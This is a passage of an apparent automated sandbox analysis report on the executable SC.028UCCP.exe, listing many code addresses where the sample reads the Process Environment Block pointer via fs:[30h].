Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E54779 mov eax, dword ptr fs:[00000030h]	6_2_34E54779
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E80774 mov eax, dword ptr fs:[00000030h]	6_2_34E80774
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8174A mov eax, dword ptr fs:[00000030h]	6_2_34E8174A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED174B mov eax, dword ptr fs:[00000030h]	6_2_34ED174B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED174B mov ecx, dword ptr fs:[00000030h]	6_2_34ED174B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E83740 mov eax, dword ptr fs:[00000030h]	6_2_34E83740
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]	6_2_34E72755
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]	6_2_34E72755
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]	6_2_34E72755
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72755 mov ecx, dword ptr fs:[00000030h]	6_2_34E72755
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]	6_2_34E72755
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]	6_2_34E72755
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A750 mov eax, dword ptr fs:[00000030h]	6_2_34E8A750
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]	6_2_34E4F75B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFE750 mov eax, dword ptr fs:[00000030h]	6_2_34EFE750
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E79723 mov eax, dword ptr fs:[00000030h]	6_2_34E79723
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]	6_2_34E4B705
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]	6_2_34E4B705
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]	6_2_34E4B705
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]	6_2_34E4B705
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D700 mov ecx, dword ptr fs:[00000030h]	6_2_34E5D700
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F717 mov eax, dword ptr fs:[00000030h]	6_2_34F0F717
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7270D mov eax, dword ptr fs:[00000030h]	6_2_34E7270D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7270D mov eax, dword ptr fs:[00000030h]	6_2_34E7270D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7270D mov eax, dword ptr fs:[00000030h]	6_2_34E7270D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1970B mov eax, dword ptr fs:[00000030h]	6_2_34F1970B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1970B mov eax, dword ptr fs:[00000030h]	6_2_34F1970B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5471B mov eax, dword ptr fs:[00000030h]	6_2_34E5471B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5471B mov eax, dword ptr fs:[00000030h]	6_2_34E5471B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4C0F6 mov eax, dword ptr fs:[00000030h]	6_2_34E4C0F6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8D0F0 mov eax, dword ptr fs:[00000030h]	6_2_34E8D0F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8D0F0 mov ecx, dword ptr fs:[00000030h]	6_2_34E8D0F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]	6_2_34E490F8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]	6_2_34E490F8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]	6_2_34E490F8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]	6_2_34E490F8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]	6_2_34E4B0D6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]	6_2_34E4B0D6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]	6_2_34E4B0D6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]	6_2_34E4B0D6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6B0D0 mov eax, dword ptr fs:[00000030h]	6_2_34E6B0D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F250B7 mov eax, dword ptr fs:[00000030h]	6_2_34F250B7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]	6_2_34EFF0A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E900A5 mov eax, dword ptr fs:[00000030h]	6_2_34E900A5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0B0AF mov eax, dword ptr fs:[00000030h]	6_2_34F0B0AF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]	6_2_34F24080
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4C090 mov eax, dword ptr fs:[00000030h]	6_2_34E4C090
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4A093 mov ecx, dword ptr fs:[00000030h]	6_2_34E4A093
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EF9060 mov eax, dword ptr fs:[00000030h]	6_2_34EF9060
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E56074 mov eax, dword ptr fs:[00000030h]	6_2_34E56074
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E56074 mov eax, dword ptr fs:[00000030h]	6_2_34E56074
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E57072 mov eax, dword ptr fs:[00000030h]	6_2_34E57072
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2505B mov eax, dword ptr fs:[00000030h]	6_2_34F2505B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E80044 mov eax, dword ptr fs:[00000030h]	6_2_34E80044
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E51051 mov eax, dword ptr fs:[00000030h]	6_2_34E51051
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E51051 mov eax, dword ptr fs:[00000030h]	6_2_34E51051
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4D02D mov eax, dword ptr fs:[00000030h]	6_2_34E4D02D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E75004 mov eax, dword ptr fs:[00000030h]	6_2_34E75004
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E75004 mov ecx, dword ptr fs:[00000030h]	6_2_34E75004
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E58009 mov eax, dword ptr fs:[00000030h]	6_2_34E58009
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92010 mov ecx, dword ptr fs:[00000030h]	6_2_34E92010
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E591E5 mov eax, dword ptr fs:[00000030h]	6_2_34E591E5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E591E5 mov eax, dword ptr fs:[00000030h]	6_2_34E591E5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]	6_2_34E5A1E3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]	6_2_34E5A1E3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]	6_2_34E5A1E3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]	6_2_34E5A1E3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]	6_2_34E5A1E3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E481EB mov eax, dword ptr fs:[00000030h]	6_2_34E481EB
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E491F0 mov eax, dword ptr fs:[00000030h]	6_2_34E491F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E491F0 mov eax, dword ptr fs:[00000030h]	6_2_34E491F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E601F1 mov eax, dword ptr fs:[00000030h]	6_2_34E601F1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E601F1 mov eax, dword ptr fs:[00000030h]	6_2_34E601F1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E601F1 mov eax, dword ptr fs:[00000030h]	6_2_34E601F1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F1F0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F1F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F1F0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F1F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F181EE mov eax, dword ptr fs:[00000030h]	6_2_34F181EE
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F181EE mov eax, dword ptr fs:[00000030h]	6_2_34F181EE
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E601C0 mov eax, dword ptr fs:[00000030h]	6_2_34E601C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E601C0 mov eax, dword ptr fs:[00000030h]	6_2_34E601C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]	6_2_34E651C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]	6_2_34E651C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]	6_2_34E651C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]	6_2_34E651C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F251B6 mov eax, dword ptr fs:[00000030h]	6_2_34F251B6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8E1A4 mov eax, dword ptr fs:[00000030h]	6_2_34E8E1A4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8E1A4 mov eax, dword ptr fs:[00000030h]	6_2_34E8E1A4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E841BB mov ecx, dword ptr fs:[00000030h]	6_2_34E841BB
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E841BB mov eax, dword ptr fs:[00000030h]	6_2_34E841BB
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E841BB mov eax, dword ptr fs:[00000030h]	6_2_34E841BB
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E831BE mov eax, dword ptr fs:[00000030h]	6_2_34E831BE
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E831BE mov eax, dword ptr fs:[00000030h]	6_2_34E831BE
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E54180 mov eax, dword ptr fs:[00000030h]	6_2_34E54180
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E54180 mov eax, dword ptr fs:[00000030h]	6_2_34E54180
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E54180 mov eax, dword ptr fs:[00000030h]	6_2_34E54180
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E79194 mov eax, dword ptr fs:[00000030h]	6_2_34E79194
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91190 mov eax, dword ptr fs:[00000030h]	6_2_34E91190
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91190 mov eax, dword ptr fs:[00000030h]	6_2_34E91190
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8716D mov eax, dword ptr fs:[00000030h]	6_2_34E8716D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EA717A mov eax, dword ptr fs:[00000030h]	6_2_34EA717A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EA717A mov eax, dword ptr fs:[00000030h]	6_2_34EA717A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E56179 mov eax, dword ptr fs:[00000030h]	6_2_34E56179
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4A147 mov eax, dword ptr fs:[00000030h]	6_2_34E4A147
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4A147 mov eax, dword ptr fs:[00000030h]	6_2_34E4A147
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4A147 mov eax, dword ptr fs:[00000030h]	6_2_34E4A147
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]	6_2_34EE314A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]	6_2_34EE314A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]	6_2_34EE314A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]	6_2_34EE314A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F23157 mov eax, dword ptr fs:[00000030h]	6_2_34F23157
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F23157 mov eax, dword ptr fs:[00000030h]	6_2_34F23157
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F23157 mov eax, dword ptr fs:[00000030h]	6_2_34F23157
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8415F mov eax, dword ptr fs:[00000030h]	6_2_34E8415F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F25149 mov eax, dword ptr fs:[00000030h]	6_2_34F25149
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E87128 mov eax, dword ptr fs:[00000030h]	6_2_34E87128
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E87128 mov eax, dword ptr fs:[00000030h]	6_2_34E87128
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F13E mov eax, dword ptr fs:[00000030h]	6_2_34F0F13E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDA130 mov eax, dword ptr fs:[00000030h]	6_2_34EDA130
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]	6_2_34E7510F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5510D mov eax, dword ptr fs:[00000030h]	6_2_34E5510D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E80118 mov eax, dword ptr fs:[00000030h]	6_2_34E80118
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E472E0 mov eax, dword ptr fs:[00000030h]	6_2_34E472E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5A2E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5A2E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5A2E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5A2E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5A2E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5A2E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]	6_2_34E582E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]	6_2_34E582E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]	6_2_34E582E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]	6_2_34E582E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4D2EC mov eax, dword ptr fs:[00000030h]	6_2_34E4D2EC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4D2EC mov eax, dword ptr fs:[00000030h]	6_2_34E4D2EC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E602F9 mov eax, dword ptr fs:[00000030h]	6_2_34E602F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E732C5 mov eax, dword ptr fs:[00000030h]	6_2_34E732C5
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F232C9 mov eax, dword ptr fs:[00000030h]	6_2_34F232C9
